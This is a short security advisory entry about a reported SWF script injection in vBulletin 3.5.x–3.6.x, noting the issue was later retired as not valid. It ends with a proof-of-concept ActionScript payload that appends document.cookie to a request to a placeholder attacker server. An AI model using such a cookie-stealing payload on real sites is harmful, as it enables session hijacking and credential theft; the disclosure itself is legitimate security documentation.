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vBulletin 3.5.x3.6.x - SWF Script Injection

🗓️ 25 Dec 2006 00:00:00Reported by Ashraf MoradType 
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vBulletin SWF Script Injection vulnerability may steal authentication credentials. SWF file upload disabled by default, requires admin enablement

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source: https://www.securityfocus.com/bid/21736/info

vBulletin is prone to a vulnerability that may let remote attackers inject arbitrary script code into the application.

If exploited, this vulnerability may let attackers steal cookie-based authentication credentials. Other attacks are also possible.

Update: Note that the ability to upload SWF files is disabled by default, and must be enabled by site administrators to expose this issue.

This BID is being retired because further information shows that the application is not vulnerable to this issue.

getURL("javascript:function blab(){}var scriptNode = 
+document.createElement('script');document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='javascript';scriptNode.src='http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie
+;blab();");

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